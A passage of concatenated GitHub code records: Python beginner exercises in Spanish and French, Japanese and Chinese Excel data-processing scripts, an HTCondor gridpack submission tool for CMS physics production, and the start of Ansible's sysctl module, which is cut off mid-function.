(4) Listar todos los clientes. \\n (5) Listar clientes preferentes. \\n (6) Terminar.\\n Escriba su opción: \"))\nclientes={}  # client records keyed by NIF\nif opcion == 1:\n    nombre=(str(input(\"Ingrese el nombre del cliente: \")))\n    direccion=(str(input(\"Ingrese la dirección del cliente: \")))\n    telefono=(str(input(\"Ingrese el teléfono del cliente: \")))\n    correo=(str(input(\"Ingrese el correo del cliente: \")))\n    Datopreferente=(int(input(\"Si el cliente es preferente digite (1) si no lo es digite (0): \")))\n    if Datopreferente == 1:\n        preferente=True\n    else:\n        preferente=False\n    datosCliente={\"Nombre\": nombre, \"Dirección\": direccion, \"Teléfono\": telefono, \"Correo\":correo, \"Preferente\": preferente}\n    NIF=int(input(\"Ingrese el NIF del cliente: \"))\n    clientes[NIF]= datosCliente\n    print(clientes)\n    print(preferente)\nelif opcion == 2:\n    clienteBorrado=clientes.pop(int(input(\"Ingrese el NIF del cliente que desea borrar: \")))\nelif opcion ==3:\n    consultaCliente=(int(input(\"Ingrese el NIF del cliente que desea ver: \")))\n    print(clientes[consultaCliente])\nelif opcion ==4:\n    print(clientes)\nelif opcion == 5:\n    print({nif: cliente for nif, cliente in clientes.items() if cliente[\"Preferente\"]})\nelse:\n    print(\"Gracias. 
Vuelva pronto\")","repo_name":"ChrisBermudezR/Mintic_2022","sub_path":"Codigo/Ciclo_01/Semana_05/Ejercicio.py","file_name":"Ejercicio.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6423646364","text":"import glob #ファイル操作用モジュール\r\nimport numpy as np #数値計算用モジュール\r\nimport pandas as pd #データ処理用モジュール\r\nimport xlwings as xw #Excel操作用モジュール\r\n\r\n\r\n\r\n#フォルダ内のファイル名を取得\r\nobj_names = glob.glob(u'./obj_files/*.obj') #正規表現で検索\r\nprint (\"obj_names =\", obj_names)\r\nprint()\r\n\r\n#xlwingsでExcelファイルを読み込み\r\nexcel_name = \"import_obj.xlsm\"\r\n#wb = xw.Book() #Excel New Bookを作成\r\nwb = xw.Book(excel_name) #既存のファイルを読み込み\r\nsht = wb.sheets[u'一覧表'] #操作するシートのインスタンスを作成\r\ntable_loc = \"C5\" #Excelデータの読み込み位置(左上)\r\n\r\n\r\n\r\n#列ラベル\r\nobj_label01 = ['製品名','部品名','最長長さ','中間長さ','最小長さ']\r\nobj_label02 = ['面積','体積','頂点数','試作単価']\r\n\r\n#データフレームを作成\r\n#obj_df_all = pd.DataFrame(index=[], columns=obj_label01+obj_label02) #空のデータを作成\r\nobj_df_all = sht.range(table_loc).options(pd.DataFrame, expand='table').value #Excelから読み込み\r\nprint(obj_df_all)\r\n\r\n\r\n\r\n#各objファイルのx,y,z長さを計算\r\nfor i in range(len(obj_names)):\r\n obj_name = obj_names[i][12:-4].split(\"_\",1) #不要文字を削除し、最初の_で区切る\r\n print(\"name =\", obj_name)\r\n\r\n #objデータから頂点データを取得\r\n obj_vtx = pd.read_csv(obj_names[i], encoding=\"shift_jis\", skiprows=2, header=None, sep='\\s+')\r\n obj_vtx.columns = ['data', 'x', 'y', 'z'] #列ラベルをつける\r\n obj_vtx = obj_vtx[obj_vtx['data']=='v'] #頂点データのみ取得して置換\r\n obj_vtx = obj_vtx[['x', 'y', 'z']].astype(np.float64) #float64に型変換\r\n #print(obj_vtx.head(5))\r\n\r\n #x,y,z方向の長さ\r\n obj_len = np.empty(3, np.float)\r\n obj_len[0] = max(obj_vtx['x']) -min(obj_vtx['x'])\r\n obj_len[1] = max(obj_vtx['y']) -min(obj_vtx['y'])\r\n obj_len[2] = max(obj_vtx['z']) -min(obj_vtx['z'])\r\n obj_len = np.sort(obj_len)[::-1] #降順(大きい順)にソート\r\n print(\"xl =\",obj_len[0], \", yl =\",obj_len[1], \", zl =\",obj_len[2])\r\n\r\n #最外形の面積・体積\r\n obj_area = obj_len[0]*obj_len[1]\r\n obj_vol = obj_len[0]*obj_len[1]*obj_len[2]\r\n print(\"area = \",obj_area, \", vol =\",obj_vol)\r\n\r\n #頂点数\r\n obj_vtx_total = len(obj_vtx['x'])\r\n print(\"vtx total = \",obj_vtx_total)\r\n\r\n #データフレームに追加\r\n obj_se01 = pd.Series([obj_name[0],obj_name[1], obj_len[0],obj_len[1],obj_len[2]], index=obj_label01)\r\n obj_se02 = pd.Series([obj_area,obj_vol, obj_vtx_total, ''], index=obj_label02)\r\n obj_se_all = pd.concat([obj_se01,obj_se02]) #データを横に結合\r\n obj_df_all = obj_df_all.append(obj_se_all, ignore_index=True) #データを縦に結合\r\n print()\r\n\r\n\r\n#データの体裁を整える\r\nobj_df_all = obj_df_all.drop_duplicates(subset=['製品名','部品名'], keep='first') #重複してたら後ろを消す\r\nobj_df_all = obj_df_all.sort_values(['製品名','部品名'], ascending=[True, True]) #昇順(小さい順)にソート\r\n\r\nprint(obj_df_all)\r\n\r\n\r\n\r\n#pandasでExcelに書き出し\r\n'''excel_writer = pd.ExcelWriter('01_モデルデータ.xlsx') #出力ファイル名を指定\r\nobj_df_all.to_excel(excel_writer, '一覧表', index=False) #シート名を指定してデータフレームを書き出す\r\nexcel_writer.save() #書き出した内容を保存'''\r\n\r\n\r\n#xlwingsでExcelに書き出し\r\nsht.range(table_loc).value = obj_df_all #Excelにデータフレームを書き込み\r\nwb.save(excel_name) #保存'''\r\n","repo_name":"sunsetyuhi/obj_py","sub_path":"import_obj01.py","file_name":"import_obj01.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39477648199","text":"# Écrivez un programme qui convertisse en degrés Celsius une température exprimée au départ en 
degrés Fahrenheit, ou l’inverse.\n# La formule de conversion est : T F =T C ×1,8 + 32\n\n\nt = 10\ntc = 0\ntf = 0\n\ntf = t * 1.8 + 32\ntc = t / 1.8 - 32\n\nprint (\"De Fahrenheit à Celsius = \", tc, \" Degres Celsius\")\nprint (\"De Celsius à Fahrenheit= \", tf, \" Degres Fahrenheit\")","repo_name":"eurbain/Ex_1","sub_path":"ex5.3.py","file_name":"ex5.3.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38185302193","text":"import re\r\nimport openpyxl\r\nfrom openpyxl import Workbook\r\nfrom openpyxl.styles import PatternFill\r\n\r\nfrom minimize_point import optimize\r\n\r\n\r\nroot_dir = \"..\\\\\"\r\n\r\nres_wb = Workbook()\r\nres_ws = res_wb.create_sheet()\r\nsheet = res_wb.active\r\ntitle = [\"Tag编号\", \"精确x\", \"精确y\", \"精确z\", \"预测精准度\", \"最优解x\", \"最优解y\", \"最优解z\", \"x差值\", \"y差值\", \"z差值\"]\r\nsheet.append(title)\r\n\r\nwb = openpyxl.load_workbook(root_dir+\"根据训练数据得到坐标.xlsx\", data_only=True)\r\nws = wb.active\r\nrows = ws.rows\r\n# 全部数据\r\nli = list(rows)\r\ni=1\r\nerror=0\r\nwith open(root_dir+\"Tag坐标信息.txt\", 'r', encoding='utf-8') as txtData:\r\n lines = txtData.readlines()\r\n for data in lines[2:]:\r\n if len(data) != 1:\r\n loc = re.findall(r\"\\d+\", data)\r\n train_row = li[i]\r\n S = [train_row[1].value, train_row[2].value, train_row[3].value, train_row[4].value]\r\n G = [train_row[5].value, train_row[6].value, train_row[7].value]\r\n anchor = [[0, 0, 1300],\r\n [5000, 0, 1700],\r\n [0, 5000, 1700],\r\n [5000, 5000, 1300]]\r\n # print(S, G)\r\n ans = optimize(anchor, S, G)\r\n # 1 ['1', '50', '50', '88'] True [543.82663116 530.89997737 931.82941295]\r\n # 324 ['324', '450', '450', '200'] False [718.35134475 676.19105009 14.30062475]\r\n # print(i, int(loc[1])*10, int(loc[2])*10, int(loc[3])*10, ans[0], ans[1][0], ans[1][1], ans[1][2],\r\n # abs(ans[1][0]-int(loc[1])*10),\r\n # abs(ans[1][1] - int(loc[2]) * 10),\r\n # abs(ans[1][2] - int(loc[3]) * 10)\r\n # )\r\n if ans[0]:\r\n sheet.append(\r\n [i, int(loc[1]) * 10, int(loc[2]) * 10, int(loc[3]) * 10, ans[0], ans[1][0], ans[1][1], ans[1][2],\r\n abs(ans[1][0] - int(loc[1]) * 10),\r\n abs(ans[1][1] - int(loc[2]) * 10),\r\n abs(ans[1][2] - int(loc[3]) * 10)])\r\n else:\r\n error+=1\r\n red_fill = PatternFill(fill_type='solid', fgColor=\"FF0000\", bgColor=\"AACF91\")\r\n sheet.row_dimensions[i+1].fill = red_fill\r\n sheet.append([i, int(loc[1])*10, int(loc[2])*10, int(loc[3])*10, ans[0], ans[1][0], ans[1][1], ans[1][2],\r\n abs(ans[1][0]-int(loc[1])*10),\r\n abs(ans[1][1] - int(loc[2]) * 10),\r\n abs(ans[1][2] - int(loc[3]) * 10)])\r\n\r\n i += 1\r\nprint(error)\r\n# res_wb.save(\"利用COBYLA算法求得最优解.xlsx\")\r\nres_wb.save(\"利用SLSQP算法求得最优解.xlsx\")\r\n# res_wb.save(\"利用TNC算法求得最优解.xlsx\")\r\n# res_wb.save(\"利用Nelder-Mead算法求得最优解.xlsx\")\r\n\r\n# res_wb.save(\"利用Powell算法求得最优解.xlsx\")\r\n# res_wb.save(\"利用trust-krylov算法求得最优解.xlsx\")","repo_name":"MysticalGuest/HuaweiCUP","sub_path":"Mission2/最优解/minimize_all.py","file_name":"minimize_all.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"43285692898","text":"#! 
/usr/bin/env python\n# Author: Izaak Neutelings (June 2020)\n# Note:\n# - Clone genproductions (official or private) with gridpack_generation.sh and cards:\n# cd /eos/user/i/ineuteli/prod\n# git clone git@github.com:cms-sw/genproductions.git genproductions\n# git clone git@github.com:IzaakWN/genproductions.git genproductions\n# - Gridpack working areas can get large; O(400MB) per gridpack\n# - AFS has a limited space (up to 10 GB, use `fs listquota`)\n# => use CMSSW working directory on EOS\n# - HTCondor jobs cannot be submitted from EOS\n# => submit from AFS\n# - git push does not work on EOS\nfrom __future__ import print_function # for python3 compatibility\nimport os, sys\nfrom create_cards import createcards, subplaceholders\nfrom utils import ensuredir, subkey, warning\n\n#print sys.path\n#basedir = \"/eos/user/i/ineuteli/production/LQ_Request2020/genproductions/bin/MadGraph5_aMCatNLO\"\n#basedir = \"genproductions/bin/MadGraph5_aMCatNLO\"\narch_dict = {\n '2016': ('slc6_amd64_gcc481','CMSSW_7_1_45_patch3'),\n '2017': ('slc6_amd64_gcc630','CMSSW_9_3_17'),\n '2018': ('slc6_amd64_gcc700','CMSSW_10_2_20'),\n 'UL2016': ('slc7_amd64_gcc700','CMSSW_10_6_31'),\n}\narch_dict['UL2017'] = arch_dict['UL2016']\narch_dict['UL2018'] = arch_dict['UL2016']\n\n\ndef findHTCondorBindings():\n # export PYTHONPATH=/usr/lib64/python2.6/site-packages\n import htcondor\n print(os.path.dirname(htcondor.__file__))\n \n\ndef submit(sample,carddir,scram,cmssw,mock=False):\n #command = \"sbatch -J gridpack_%s submit_gridpack_generation_SLURM.sh %s %s\"%(sample,sample,carddir)\n #command = \"qsub -N gridpack_%s submit_gridpack_generation_SGE.sh %s %s %s %s\"%(sample,sample,carddir,scram,cmssw)\n command = \"./submit_condor_gridpack_generation.sh %s %s %s %s\"%(sample,carddir,scram,cmssw)\n print(command)\n if not mock:\n os.system(command)\n \n\ndef submitArgFile(jobname,argfile,jobdir=\"jobs\",mock=False):\n logdir = ensuredir(os.path.join(jobdir,'log'))\n logfile = os.path.join(logdir,\"%s.$(ClusterId).$(ProcId).log\"%(jobname))\n command = \"condor_submit -batch-name %s -append mylogfile='%s' submit_gridpack_condor.sub -queue arg from %s\"%(jobname,logfile,argfile)\n print(\">>> %s\"%(command))\n if not mock:\n os.system(command)\n \n\ndef createArgFile(jobname,name,masses,scram,cmssw,carddir,jobdir=\"jobs\",workdir=None):\n ensuredir(jobdir)\n jobname = jobname.replace('$MASS','')\n fname = os.path.join(jobdir,\"args_%s.txt\"%(jobname))\n print(\">>> %s\"%(jobname))\n with open(fname,'w+') as file:\n for mass in masses:\n ###for lambd in lambdas:\n ###print \">>> mass=%s, lambda=%s\"%(mass,lambd)\n ###lambd = str(lambd).replace('.','p')\n name_ = subkey(name,MASS=mass) #\"%sScalarLQToBTau_M%s_L%s\"%(proc,mass,lambd)\n carddir_ = subkey(carddir,MASS=mass) #\"%sScalarLQToBTau_M%s_L%s\"%(proc,mass,lambd)\n ###if carddir_[0]!='/':\n ### carddir_ = os.path.abspath(carddir_)\n ###carddir_ = os.path.join(carddir,name_)\n fulldir = os.path.abspath(carddir_) #os.path.join(basedir,carddir)\n workdir_ = os.path.join(workdir,name_)\n if not os.path.exists(fulldir):\n print(warning(\"createArgFile: Sample card directory does not exist! %r\"%(fulldir),pre=\">>> \"))\n if os.path.exists(workdir_): # created by gridpack_generation.sh\n print(warning(\"createArgFile: Work directory already exists! 
Please remove %r\"%(workdir_),pre=\">>> \"))\n if workdir: # create path relative to gridpack_generation.sh in workdir\n carddir_ = os.path.relpath(carddir_,workdir)\n if workdir and workdir[0]=='/' and fulldir[0]=='/' and workdir.split('/')[:2]!=fulldir.split('/')[:2]:\n print(warning(\"createArgFile: carddir and workdir are not on the same system? carddir=%s vs. workdir=%s\"%(fulldir,workdir),pre=\">>> \"))\n args = \"%s %s %s %s\"%(name_,carddir_,scram,cmssw)\n print(\">>> %s\"%(args))\n file.write(args+'\\n')\n return fname\n \n\ndef main(args):\n #findHTCondorBindings()\n \n create = args.create\n mock = args.mock\n #carddirs = [\"cards/production/2017/13TeV/ScalarLQ/\"]\n carddirs = args.carddirs\n cardname = args.cardname or \"$NAME_M$MASS_L$LAMBDA\"\n jobname = \"$NAME_L$LAMBDA_$ERA\" # no mass\n eras = args.eras\n ###models = args.models #['VectorLQ','ScalarLQ']\n ###procs = args.procs #['Single',] #'Pair']\n #masses = [600,800,1000,1200,1400,1700,2000] #500,800,1100,1400,1700,2000,2300]\n masses = args.masses or [600,1400,2000]\n lambdas = args.lambdas or [1.0]\n jobdir = args.jobdir #\"jobs/\"\n basedir = args.workdir or \"/afs/cern.ch/user/i/ineuteli/prod/CRAB/CMSSW_10_6_19/src\"\n #basedir = args.workdir or \"/eos/user/i/ineuteli/prod\" #CMSSW_10_6_19/src\"\n workdir = os.path.join(basedir,\"genproductions/bin/MadGraph5_aMCatNLO\")\n if basedir.startswith('/eos/'): # on EOS: ensure cards relative to workdir\n outdir = os.path.join(basedir,'cards/$CARDNAME')\n else: # on AFS\n outdir = os.path.join(jobdir,'cards/$CARDNAME')\n verbosity = args.verbosity+2\n #lambdas = [1.5,2.0,2.5]\n #jobname = \"%sScalarLQToBTau_L%s_%s\"%(proc,lambd,era)\n #sample = \"%sScalarLQToBTau_M%s_L%s\"%(proc,mass,lambd)\n #jobname = \"$PROC$SPIN$MODEL_L$LAMBDA_$MASS_$ERA\"\n #os.chdir(basedir)\n assert os.path.exists(workdir), \"Working directory %s does not exist!\"%(workdir)\n \n for carddir in carddirs:\n if create: # create datacards locally\n print(\">>> Create data cards...\")\n paramdict = { 'LAMBDA': lambdas }\n names = createcards(carddir,cardname,masses,paramdict,outdir=outdir,verb=verbosity)\n name_ = names[0]\n else: # use datacards in CMSSW\n name_ = os.basename(carddir.rstrip('/'))\n ###basedir = \"$CMSSW_BASE/genproductions/bin/MadGraph5_aMCatNLO\"\n ###fulldir = os.path.join(basedir,carddir)\n ###if not os.path.exists(fulldir):\n ### print(\">>> Card directory does not exist! 
%r\"%(fulldir))\n for era in eras:\n scram, cmssw = arch_dict[era]\n ###for model in models:\n ### for proc in procs:\n \n # PRINT\n if verbosity>=1:\n print(\">>> \"+'='*90)\n print(\">>> name = %r\"%name_)\n print(\">>> cardname = %r\"%cardname)\n print(\">>> jobname = %r\"%jobname)\n print(\">>> carddir = %s\"%carddir)\n print(\">>> workdir = %s\"%workdir)\n print(\">>> outdir = %s\"%outdir)\n print(\">>> masses = %s\"%masses)\n print(\">>> lambdas = %s\"%lambdas)\n print(\">>> era = %s\"%era)\n print(\">>> scram = %s\"%scram)\n print(\">>> cmssw = %s\"%cmssw)\n print(\">>> \"+'='*90)\n \n for lambd in lambdas:\n lambd = str(lambd).replace('.','p')\n jobname_ = subplaceholders(jobname,NAME=name_,LAMBDA=lambd,ERA=era) #,MODEL=model,PROC=proc\n cardname_ = subkey(cardname,NAME=name_,LAMBDA=lambd,ERA=era) # ignore $MASS\n carddir_ = subkey(outdir,CARDNAME=cardname_,NAME=name_,LAMBDA=lambd,ERA=era)\n if verbosity>=2:\n #print(\">>> carddir=%r, era=%r, lambda=%r, name=%r, scram=%r, cmssw=%r\"%(carddir,era,lambd,name,scram,cmssw))\n print(\">>> lambda=%r, name=%r, jobname=%r, cardname=%r -> %r\"%(lambd,name_,jobname_,cardname,cardname_))\n argfile = createArgFile(jobname_,cardname_,masses,scram,cmssw,carddir_,jobdir=jobdir,workdir=workdir)\n submitArgFile(jobname_,argfile,jobdir=jobdir,mock=mock)\n print()\n #for mass in masses:\n # for lambd in lambdas:\n # print(\">>> mass=%s, lambda=%s\"%(mass,lambd))\n # lambd = str(lambd).replace('.','p')\n # sample = \"%sScalarLQToBTau_M%s_L%s\"%(proc,mass,lambd)\n # samdir = os.path.join(carddir,sample)\n # fulldir = os.path.join(basedir,samdir)\n # if not os.path.exists(fulldir):\n # print(\">>> Sample card directory does not exist! %r\"%(fulldir))\n # submit(sample,samdir,scram,cmssw)\n # print()\n \n\nif __name__=='__main__':\n print()\n from argparse import ArgumentParser\n description = '''Create gridpack with condor jobs.'''\n parser = ArgumentParser(prog=\"submit_gridpack_condor\",description=description,epilog=\"Good luck!\")\n parser.add_argument('carddirs', type=str, nargs='+', action='store',\n metavar='CARDDIRS', help=\"directoy with cards\" )\n parser.add_argument('-c', '--create', dest='create', action='store_true',\n help=\"create cards before submitting\" )\n parser.add_argument('-m', '--mock', action='store_true',\n help=\"mock submit (for debugging)\" )\n ###parser.add_argument( '--model', dest='models', nargs='+', choices=['VectorLQ','ScalarLQ'],\n ### help=\"models\" )\n ###parser.add_argument('-p', '--proc', dest='procs', nargs='+', choices=['Pair','Single','NonRes'],\n ### help=\"processes\" )\n parser.add_argument('-n', '--cardname', type=str, action='store', default=None,\n help=\"card name (placeholders allowed)\" )\n parser.add_argument('-M', '--mass', dest='masses', nargs='+', type=int,\n help=\"select masses\" )\n parser.add_argument('-L', '--lambda', dest='lambdas', nargs='+', default=[1.0], type=float,\n help=\"select lambdas\" )\n parser.add_argument('-y', '--era', dest='eras', nargs='+', default=['UL2017'], #choices=[2016,2017,2018], \n help=\"select year/era\" )\n ###parser.add_argument('-o', '--outdir', default='jobdir/cards',\n ### help=\"output directory for cards\" )\n parser.add_argument('-j', '--jobdir', default='jobs',\n help=\"output directory for cards\" )\n parser.add_argument('-w', '--workdir', help=\"parent directory of genproductions\" )\n parser.add_argument('-v', \"--verbose\", dest='verbosity', type=int, nargs='?', const=2, default=1,\n help=\"set level of verbosity, default=%(default)s\" )\n args = 
parser.parse_args()\n main(args)\n print(\">>> Done.\")\n print()\n \n","repo_name":"IzaakWN/CRAB","sub_path":"submit_gridpack_condor.py","file_name":"submit_gridpack_condor.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31221656152","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# (c) 2012, David \"DaviXX\" CHANIAL \n# (c) 2014, James Tanner \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nDOCUMENTATION = r'''\n---\nmodule: sysctl\nshort_description: Manage entries in sysctl.conf.\ndescription:\n - This module manipulates sysctl entries and optionally performs a C(/sbin/sysctl -p) after changing them.\nversion_added: \"1.0.0\"\noptions:\n name:\n description:\n - The dot-separated path (also known as I(key)) specifying the sysctl variable.\n required: true\n aliases: [ 'key' ]\n type: str\n value:\n description:\n - Desired value of the sysctl key.\n aliases: [ 'val' ]\n type: str\n state:\n description:\n - Whether the entry should be present or absent in the sysctl file.\n choices: [ \"present\", \"absent\" ]\n default: present\n type: str\n ignoreerrors:\n description:\n - Use this option to ignore errors about unknown keys.\n type: bool\n default: 'no'\n reload:\n description:\n - If C(yes), performs a I(/sbin/sysctl -p) if the C(sysctl_file) is\n updated. If C(no), does not reload I(sysctl) even if the\n C(sysctl_file) is updated.\n type: bool\n default: 'yes'\n sysctl_file:\n description:\n - Specifies the absolute path to C(sysctl.conf), if not C(/etc/sysctl.conf).\n default: /etc/sysctl.conf\n type: path\n sysctl_set:\n description:\n - Verify token value with the sysctl command and set with -w if necessary\n type: bool\n default: 'no'\nauthor:\n- David CHANIAL (@davixx)\n'''\n\nEXAMPLES = r'''\n# Set vm.swappiness to 5 in /etc/sysctl.conf\n- ansible.posix.sysctl:\n name: vm.swappiness\n value: '5'\n state: present\n\n# Remove kernel.panic entry from /etc/sysctl.conf\n- ansible.posix.sysctl:\n name: kernel.panic\n state: absent\n sysctl_file: /etc/sysctl.conf\n\n# Set kernel.panic to 3 in /tmp/test_sysctl.conf\n- ansible.posix.sysctl:\n name: kernel.panic\n value: '3'\n sysctl_file: /tmp/test_sysctl.conf\n reload: no\n\n# Set ip forwarding on in /proc and verify token value with the sysctl command\n- ansible.posix.sysctl:\n name: net.ipv4.ip_forward\n value: '1'\n sysctl_set: yes\n\n# Set ip forwarding on in /proc and in the sysctl file and reload if necessary\n- ansible.posix.sysctl:\n name: net.ipv4.ip_forward\n value: '1'\n sysctl_set: yes\n state: present\n reload: yes\n'''\n\n# ==============================================================\n\nimport os\nimport platform\nimport re\nimport tempfile\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.six import string_types\nfrom ansible.module_utils.parsing.convert_bool import BOOLEANS_FALSE, BOOLEANS_TRUE\nfrom ansible.module_utils._text import to_native\n\n\nclass SysctlModule(object):\n\n # We have to use LANG=C because we are capturing STDERR of sysctl to detect\n # success or failure.\n LANG_ENV = {'LANG': 'C', 'LC_ALL': 'C', 'LC_MESSAGES': 'C'}\n\n def __init__(self, module):\n self.module = module\n self.args = self.module.params\n\n self.sysctl_cmd = self.module.get_bin_path('sysctl', required=True)\n self.sysctl_file = 
self.args['sysctl_file']\n\n self.proc_value = None # current token value in proc fs\n self.file_value = None # current token value in file\n self.file_lines = [] # all lines in the file\n self.file_values = {} # dict of token values\n\n self.changed = False # will change occur\n self.set_proc = False # does sysctl need to set value\n self.write_file = False # does the sysctl file need to be reloaded\n\n self.process()\n\n # ==============================================================\n # LOGIC\n # ==============================================================\n\n def process(self):\n\n self.platform = platform.system().lower()\n\n # Whitespace is bad\n self.args['name'] = self.args['name'].strip()\n self.args['value'] = self._parse_value(self.args['value'])\n\n thisname = self.args['name']\n\n # get the current proc fs value\n self.proc_value = self.get_token_curr_value(thisname)\n\n # get the current sysctl file value\n self.read_sysctl_file()\n if thisname not in self.file_values:\n self.file_values[thisname] = None\n\n # update file contents with desired token/value\n self.fix_lines()\n\n # what do we need to do now?\n if self.file_values[thisname] is None and self.args['state'] == \"present\":\n self.changed = True\n self.write_file = True\n elif self.file_values[thisname] is None and self.args['state'] == \"absent\":\n self.changed = False\n elif self.file_values[thisname] and self.args['state'] == \"absent\":\n self.changed = True\n self.write_file = True\n elif self.file_values[thisname] != self.args['value']:\n self.changed = True\n self.write_file = True\n # with reload=yes we should check if the current system values are\n # correct, so that we know if we should reload\n elif self.args['reload']:\n if self.proc_value is None:\n self.changed = True\n elif not self._values_is_equal(self.proc_value, self.args['value']):\n self.changed = True\n\n # use the sysctl command or not?\n if self.args['sysctl_set'] and self.args['state'] == \"present\":\n if self.proc_value is None:\n self.changed = True\n elif not self._values_is_equal(self.proc_value, self.args['value']):\n self.changed = True\n self.set_proc = True\n\n # Do the work\n if not self.module.check_mode:\n if self.set_proc:\n self.set_token_value(self.args['name'], self.args['value'])\n if self.write_file:\n self.write_sysctl()\n if self.changed and self.args['reload']:\n self.reload_sysctl()\n\n def _values_is_equal(self, a, b):\n \"\"\"Expects two string values. It will split the string by whitespace\n and compare each value. It will return True if both lists are the same,\n contain the same elements and the same order.\"\"\"\n if a is None or b is None:\n return False\n\n a = a.split()\n b = b.split()\n\n if len(a) != len(b):\n return False\n\n return len([i for i, j in zip(a, b) if i == j]) == len(a)\n\n def _parse_value(self, value):\n if value is None:\n return ''\n elif isinstance(value, bool):\n if value:\n return '1'\n else:\n return '0'\n elif isinstance(value, string_types):\n if value.lower() in BOOLEANS_TRUE:\n return '1'\n elif value.lower() in BOOLEANS_FALSE:\n return '0'\n else:\n return value.strip()\n else:\n return value\n\n def _stderr_failed(self, err):\n # sysctl can fail to set a value even if it returns an exit status 0\n # (https://bugzilla.redhat.com/show_bug.cgi?id=1264080). That's why we\n # also have to check stderr for errors. 
For now we will only fail on\n # specific errors defined by the regex below.\n errors_regex = r'^sysctl: setting key \"[^\"]+\": (Invalid argument|Read-only file system)$'\n return re.search(errors_regex, err, re.MULTILINE) is not None\n\n # ==============================================================\n # SYSCTL COMMAND MANAGEMENT\n # ==============================================================\n\n # Use the sysctl command to find the current value\n def get_token_curr_value(self, token):\n if self.platform == 'openbsd':\n # openbsd doesn't support -e, just drop it\n thiscmd = \"%s -n %s\" % (self.sysctl_cmd, token)\n else:\n thiscmd = \"%s -e -n %s\" % (self.sysctl_cmd, token)\n rc, out, err = self.module.run_command(thiscmd, environ_update=self.LANG_ENV)\n if rc != 0:\n return None\n else:\n return out\n\n # Use the sysctl command to set the current value\n def set_token_value(self, token, value):\n if len(value.split()) > 0:\n value = '\"' + value + '\"'\n if self.platform == 'openbsd':\n # openbsd doesn't accept -w, but since it's not needed, just drop it\n thiscmd = \"%s %s=%s\" % (self.sysctl_cmd, token, value)\n elif self.platform == 'freebsd':\n ignore_missing = ''\n if self.args['ignoreerrors']:\n ignore_missing = '-i'\n # freebsd doesn't accept -w, but since it's not needed, just drop it\n thiscmd = \"%s %s %s=%s\" % (self.sysctl_cmd, ignore_missing, token, value)\n else:\n ignore_missing = ''\n if self.args['ignoreerrors']:\n ignore_missing = '-e'\n thiscmd = \"%s %s -w %s=%s\" % (self.sysctl_cmd, ignore_missing, token, value)\n rc, out, err = self.module.run_command(thiscmd, environ_update=self.LANG_ENV)\n if rc != 0 or self._stderr_failed(err):\n self.module.fail_json(msg='setting %s failed: %s' % (token, out + err))\n else:\n return rc\n\n # Run sysctl -p\n def reload_sysctl(self):\n if self.platform == 'freebsd':\n # freebsd doesn't support -p, so reload the sysctl service\n rc, out, err = self.module.run_command('/etc/rc.d/sysctl reload', environ_update=self.LANG_ENV)\n elif self.platform == 'openbsd':\n # openbsd doesn't support -p and doesn't have a sysctl service,\n # so we have to set every value with its own sysctl call\n for k, v in self.file_values.items():\n rc = 0\n if k != self.args['name']:\n rc = self.set_token_value(k, v)\n # FIXME this check is probably not needed as set_token_value would fail_json if rc != 0\n if rc != 0:\n break\n if rc == 0 and self.args['state'] == \"present\":\n rc = self.set_token_value(self.args['name'], self.args['value'])\n\n # set_token_value would have called fail_json in case of failure\n # so return here and do not continue to the error processing below\n # https://github.com/ansible/ansible/issues/58158\n return\n else:\n # system supports reloading via the -p flag to sysctl, so we'll use that\n sysctl_args = [self.sysctl_cmd, '-p', self.sysctl_file]\n if self.args['ignoreerrors']:\n sysctl_args.insert(1, '-e')\n\n rc, out, err = self.module.run_command(sysctl_args, environ_update=self.LANG_ENV)\n\n if rc != 0 or self._stderr_failed(err):\n self.module.fail_json(msg=\"Failed to reload sysctl: %s\" % to_native(out) + to_native(err))\n\n # ==============================================================\n # SYSCTL FILE MANAGEMENT\n # ==============================================================\n\n # Get the token value from the sysctl file\n def read_sysctl_file(self):\n\n lines = []\n if os.path.isfile(self.sysctl_file):\n try:\n with open(self.sysctl_file, \"r\") as read_file:\n lines = read_file.readlines()\n except IOError 
as e:\n self.module.fail_json(msg=\"Failed to open %s: %s\" % (to_native(self.sysctl_file), to_native(e)))\n\n for line in lines:\n line = line.strip()\n self.file_lines.append(line)\n\n # don't split empty lines or comments or line without equal sign\n if not line or line.startswith((\"#\", \";\")) or \"=\" not in line:\n continue\n\n k, v = line.split('=', 1)\n k = k.strip()\n v = v.strip()\n self.file_values[k] = v.strip()\n\n # Fix the value in the sysctl file content\n def fix_lines(self):\n checked = []\n self.fixed_lines = []\n for line in self.file_lines:\n if not line.strip() or line.strip().startswith((\"#\", \";\")) or \"=\" not in line:\n self.fixed_lines.append(line)\n continue\n tmpline = line.strip()\n k, v = tmpline.split('=', 1)\n k = k.strip()\n v = v.strip()\n if k not in checked:\n checked.append(k)\n if k == self.args['name']:\n if self.args['state'] == \"present\":\n new_line = \"%s=%s\\n\" % (k, self.args['value'])\n self.fixed_lines.append(new_line)\n else:\n new_line = \"%s=%s\\n\" % (k, v)\n self.fixed_lines.append(new_line)\n\n if self.args['name'] not in checked and self.args['state'] == \"present\":\n new_line = \"%s=%s\\n\" % (self.args['name'], self.args['value'])\n self.fixed_lines.append(new_line)\n\n # Completely rewrite the sysctl file\n def write_sysctl(self):\n # open a tmp file\n fd, tmp_path = tempfile.mkstemp('.conf', '.ansible_m_sysctl_', os.path.dirname(self.sysctl_file))\n f = open(tmp_path, \"w\")\n try:\n for l in self.fixed_lines:\n f.write(l.strip() + \"\\n\")\n except IOError as e:\n self.module.fail_json(msg=\"Failed to write to file %s: %s\" % (tmp_path, to_native(e)))\n f.flush()\n f.close()\n\n # replace the real one\n 